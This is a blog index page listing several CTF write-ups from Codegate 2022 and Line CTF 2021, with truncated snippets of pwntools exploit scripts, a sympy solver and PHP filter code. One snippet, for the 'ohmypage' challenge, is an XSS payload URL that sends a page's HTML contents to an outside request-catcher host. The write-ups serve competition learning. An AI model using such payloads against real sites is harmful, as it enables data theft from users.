CTF write up(48)
-
[CTF write up] Codegate CTF 2022 Junior - Lotto : Basic Window Reversing
import sympy a1 = sympy.Symbol('a1') a2 = sympy.Symbol('a2') a3 = sympy.Symbol('a3') a4 = sympy.Symbol('a4') a5 = sympy.Symbol('a5') a6 = sympy.Symbol('a6') eq1 = a2 + 2 * a1 - 20 eq2 = a3 + 7 * a1 - a2 - 35 eq3 = 7 * a2 - 2 * a1 - a3 - 64 eq4 = 5 * a3 + 3 * a1 - a2 - 135 eq5 = 3 * a5 + a4 - 156 eq6 = a6 + 3 * a4 - a6 * a5 + 1530 eq7 = a6 + a5 - a4 - 46 result = sympy.solve((eq1,eq2,eq3,eq4,eq5,..
2022.03.06 -
[CTF write up] Line CTF 2021 - bank : Complex Binary
from pwn import * import ctypes import time context(arch = "amd64", os = "linux") def command_adduser(id, ps): p.sendlineafter(b': ',b'6') p.sendlineafter(b': ', id) p.sendlineafter(b': ', ps) def command_login(id, ps): p.sendlineafter(b': ',b'7') p.sendlineafter(b': ', id) p.sendlineafter(b': ', ps) def command_loan(): p.sendlineafter(b': ',b'4') def command_logout(): p.sendlineafter(b': ',b'8'..
2022.03.03 -
[CTF write up] Codegate 2022 General - CAFE : PHP parse_url Spoofing to XSS
문제 파일에 admin 계정 정보가 포함되어 있어서 그대로 로그인하면 플래그를 얻을 수 있는 띠용한 Unintened 풀이가 있었다고 한다. 평범한 XSS 문제다. XSS 취약점이 있는 게시판에 글을 쓸 수 있고 report를 통해 봇이 자바스크립트를 실행하도록 할 수 있다. function filterHtml($content) { $result = ''; $html = new simple_html_dom(); $html->load($content); $allowTag = ['a', 'img', 'p', 'span', 'br', 'hr', 'b', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'strong', 'em', 'code', 'iframe']; foreach($allowTag..
2022.03.02 -
[CTF write up] Codegate CTF 2022 Junior - UDgame : UP and Down Misc
from pwn import * import random context.log_level = 'debug' p = remote("52.79.50.189", 4321) def check(inp): p.sendlineafter(b':',str(inp)) res = p.recvuntil(b'!') print(res) if b'codegate' in res: p.interactive() if b'DOWN' in res: return 'DOWN' elif b'UP' in res: return 'UP' elif b'funny' in res: return '??' else: return 'True' con = 1 p.sendlineafter(b'>',b'y') while(True): if con == 0: break..
2022.02.27 -
[CTF write up] Codegate CTF 2022 Junior - ohmypage : XSS to get html contents
search 페이지에서 XSS가 발생하고 report 페이지에서 관리자에게 XSS를 트리거할 수 있다. 문제는 cookie가 httponly로 설정되어 있어서 탈취가 불가능하다. 그래서 My Page에 표시된 값을 긁어와야 된다. 자바스크립트를 제대로 써본적이 없기 때문에 관련 XSS 페이로드를 찾아보려고 했지만 찾을 수 없었다.. 그래서 굉장히 많은 시간을 들여서 페이로드를 직접 만들었다. http://3.38.235.13:8881/search?text=%3Ciframe%20onload=%22location.href%20=%27https://ldbknsp.request.dreamhack.games?html=%27.concat(document.getElementById(%27target%27).conte..
2022.02.27 -
[CTF write up] Codegate CTF 2022 Junior - mungchistak : PTR Overwrite
from pwn import * def event1(): for i in range(0,7): p.sendlineafter(b'>',b'1') p.sendlineafter(b'>',b'2') p.sendlineafter(b'>',b'3') def event2(): p.sendlineafter(b'>',b'1') p.sendlineafter(b'>', b'1') p.sendlineafter(b'>',b'3') #p = process('mungchistack') p = remote('3.39.32.143',5333) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') p.sendline(b'a') event2() p.sendline(b'12') lic = u64(p.recvun..
2022.02.27